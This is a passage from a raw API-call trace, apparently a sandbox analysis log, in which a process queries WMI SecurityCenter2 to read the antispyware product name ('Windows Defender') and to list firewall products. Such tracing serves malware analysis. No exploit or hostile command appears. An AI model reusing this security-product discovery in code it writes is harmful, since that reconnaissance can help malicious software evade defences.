Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.072] WbemDefPath:IUnknown:Release (This=0x5e89350) returned 0x3 [0216.072] CoGetContextToken (in: pToken=0x36e338 | out: pToken=0x36e338) returned 0x0 [0216.072] CoGetContextToken (in: pToken=0x36e74c | out: pToken=0x36e74c) returned 0x0 [0216.072] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7cc | out: ppvObject=0x36e7cc*=0x0) returned 0x80004002 [0216.072] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x2 [0216.072] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x1 [0216.072] CoGetContextToken (in: pToken=0x36f0dc | out: pToken=0x36f0dc) returned 0x0 [0216.072] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0216.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x769008, riid=0x36f10c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f108 | out: ppvObject=0x36f108*=0x769008) returned 0x0 [0216.073] WbemDefPath:IUnknown:AddRef (This=0x769008) returned 0x3 [0216.073] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x2 [0216.073] WbemDefPath:IWbemPath:SetText (This=0x769008, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f288 | out: puCount=0x36f288*=0x2) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f284*=0x0, pszText=0x0 | out: puBuffLength=0x36f284*=0x19, pszText=0x0) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f284*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f284*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f254 | out: puCount=0x36f254*=0x2) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f250*=0x0, pszText=0x0 | out: puBuffLength=0x36f250*=0x19, pszText=0x0) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f250*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f250*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.073] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="displayName", lFlags=0, pVal=0x36f250*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x246e79c*=0, plFlavor=0x246e7a0*=0 | out: pVal=0x36f250*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x246e79c*=8, plFlavor=0x246e7a0*=0) returned 0x0 [0216.073] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.073] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.073] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="displayName", lFlags=0, pVal=0x36f258*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x246e79c*=8, plFlavor=0x246e7a0*=0 | out: pVal=0x36f258*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x246e79c*=8, plFlavor=0x246e7a0*=0) returned 0x0 [0216.073] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.073] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f254 | out: puCount=0x36f254*=0x2) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f250*=0x0, pszText=0x0 | out: puBuffLength=0x36f250*=0x19, pszText=0x0) returned 0x0 [0216.073] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f250*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f250*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.074] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="displayName", lFlags=0, pVal=0x36f250*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x246e8ac*=0, plFlavor=0x246e8b0*=0 | out: pVal=0x36f250*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x246e8ac*=8, plFlavor=0x246e8b0*=0) returned 0x0 [0216.074] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.074] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.074] IWbemClassObject:Get (in: This=0x5e8fdf8, wszName="displayName", lFlags=0, pVal=0x36f258*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x246e8ac*=8, plFlavor=0x246e8b0*=0 | out: pVal=0x36f258*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Windows Defender", varVal2=0x0), pType=0x246e8ac*=8, plFlavor=0x246e8b0*=0) returned 0x0 [0216.074] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.074] SysStringByteLen (bstr="Windows Defender") returned 0x20 [0216.074] CoTaskMemAlloc (cb=0x4) returned 0x5e89380 [0216.074] IEnumWbemClassObject:Next (in: This=0x70fab8, lTimeout=-1, uCount=0x1, apObjects=0x5e89380, puReturned=0x246deb0 | out: apObjects=0x5e89380*=0x0, puReturned=0x246deb0*=0x0) returned 0x1 [0216.075] CoTaskMemFree (pv=0x5e89380) [0216.075] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0216.075] IUnknown:Release (This=0x70fab8) returned 0x1 [0216.075] IUnknown:Release (This=0x70fab8) returned 0x0 [0216.076] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0216.076] IUnknown:Release (This=0x70f9f0) returned 0x1 [0216.076] IUnknown:Release (This=0x70f9f0) returned 0x0 [0216.077] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0216.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0216.077] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0216.077] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0216.078] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x5e89380) returned 0x0 [0216.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89380, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0216.078] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89380, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x769078) returned 0x0 [0216.078] WbemDefPath:IUnknown:Release (This=0x5e89380) returned 0x0 [0216.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x769078) returned 0x0 [0216.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0216.078] WbemDefPath:IUnknown:AddRef (This=0x769078) returned 0x3 [0216.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0216.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0216.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x5e89300) returned 0x0 [0216.079] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89300, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.079] WbemDefPath:IUnknown:Release (This=0x5e89300) returned 0x3 [0216.079] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0216.079] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0216.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0216.079] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x2 [0216.079] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x1 [0216.079] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0216.079] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0216.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x769078) returned 0x0 [0216.079] WbemDefPath:IUnknown:AddRef (This=0x769078) returned 0x3 [0216.079] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x2 [0216.079] WbemDefPath:IWbemPath:SetText (This=0x769078, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x769078, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x19, pszText=0x0) returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f29c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f29c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x769078, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x19, pszText=0x0) returned 0x0 [0216.079] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=4, puBuffLength=0x36f288*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f288*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.079] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0216.080] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0216.080] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0216.080] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0216.080] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x5e8dd78) returned 0x0 [0216.080] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8dd78, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x0) returned 0x80004002 [0216.080] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8dd78, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e89330) returned 0x0 [0216.080] WbemLocator:IUnknown:Release (This=0x5e8dd78) returned 0x0 [0216.080] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e89330) returned 0x0 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0216.081] WbemLocator:IUnknown:AddRef (This=0x5e89330) returned 0x3 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0216.081] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0216.081] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0216.081] WbemLocator:IUnknown:Release (This=0x5e89330) returned 0x2 [0216.081] WbemLocator:IUnknown:Release (This=0x5e89330) returned 0x1 [0216.081] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0216.081] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0216.081] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89330, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e89330) returned 0x0 [0216.081] WbemLocator:IUnknown:AddRef (This=0x5e89330) returned 0x3 [0216.081] WbemLocator:IUnknown:Release (This=0x5e89330) returned 0x2 [0216.081] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x769078, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0216.081] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x19, pszText=0x0) returned 0x0 [0216.081] WbemDefPath:IWbemPath:GetText (in: This=0x769078, lFlags=8, puBuffLength=0x36f1f4*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f1f4*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0216.082] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e89310) returned 0x0 [0216.082] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e89310, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x793328) returned 0x0 [0216.088] WbemLocator:IUnknown:QueryInterface (in: This=0x793328, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x7852a4) returned 0x0 [0216.088] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7852a4, pProxy=0x793328, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0216.088] WbemLocator:IUnknown:Release (This=0x7852a4) returned 0x1 [0216.088] WbemLocator:IUnknown:QueryInterface (in: This=0x793328, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x7852c4) returned 0x0 [0216.089] WbemLocator:IUnknown:QueryInterface (in: This=0x793328, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x7852a4) returned 0x0 [0216.089] WbemLocator:IClientSecurity:SetBlanket (This=0x7852a4, pProxy=0x793328, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.089] WbemLocator:IUnknown:Release (This=0x7852a4) returned 0x2 [0216.089] WbemLocator:IUnknown:Release (This=0x7852c4) returned 0x1 [0216.089] CoTaskMemFree (pv=0x7940f8) [0216.089] WbemLocator:IUnknown:AddRef (This=0x793328) returned 0x2 [0216.089] WbemLocator:IUnknown:Release (This=0x5e89310) returned 0x0 [0216.089] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0216.090] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0216.090] WbemLocator:IUnknown:QueryInterface (in: This=0x793328, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x7852ac) returned 0x0 [0216.090] WbemLocator:IRpcOptions:Query (in: This=0x7852ac, pPrx=0x5e8dee0, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0216.090] WbemLocator:IUnknown:Release (This=0x7852ac) returned 0x2 [0216.090] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0216.090] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0216.090] WbemLocator:IUnknown:QueryInterface (in: This=0x793328, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x793328) returned 0x0 [0216.090] WbemLocator:IUnknown:Release (This=0x793328) returned 0x2 [0216.090] SysStringLen (param_1=0x0) returned 0x0 [0216.090] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0216.090] IWbemServices:ExecQuery (in: This=0x793328, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f928) returned 0x0 [0216.093] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f060 | out: ppvObject=0x36f060*=0x70f92c) returned 0x0 [0216.093] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f0b0, pAuthzSvc=0x36f0ac, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8, pImpLevel=0x36f098, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0 | out: pAuthnSvc=0x36f0b0*=0xa, pAuthzSvc=0x36f0ac*=0x0, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8*=0x6, pImpLevel=0x36f098*=0x2, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0*=0x1) returned 0x0 [0216.093] IUnknown:Release (This=0x70f92c) returned 0x1 [0216.093] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f054 | out: ppvObject=0x36f054*=0x784a54) returned 0x0 [0216.093] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f040 | out: ppvObject=0x36f040*=0x70f92c) returned 0x0 [0216.093] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.095] IUnknown:Release (This=0x70f92c) returned 0x2 [0216.095] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0216.095] CoTaskMemFree (pv=0x794098) [0216.095] IUnknown:AddRef (This=0x70f928) returned 0x2 [0216.095] CoGetContextToken (in: pToken=0x36e580 | out: pToken=0x36e580) returned 0x0 [0216.095] CoGetContextToken (in: pToken=0x36e994 | out: pToken=0x36e994) returned 0x0 [0216.095] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e92c | out: ppvObject=0x36e92c*=0x784a3c) returned 0x0 [0216.095] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8dec8, dwProperty=2, pdwValue=0x36ea20 | out: pdwValue=0x36ea20) returned 0x80004002 [0216.096] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0216.096] CoGetContextToken (in: pToken=0x36ef64 | out: pToken=0x36ef64) returned 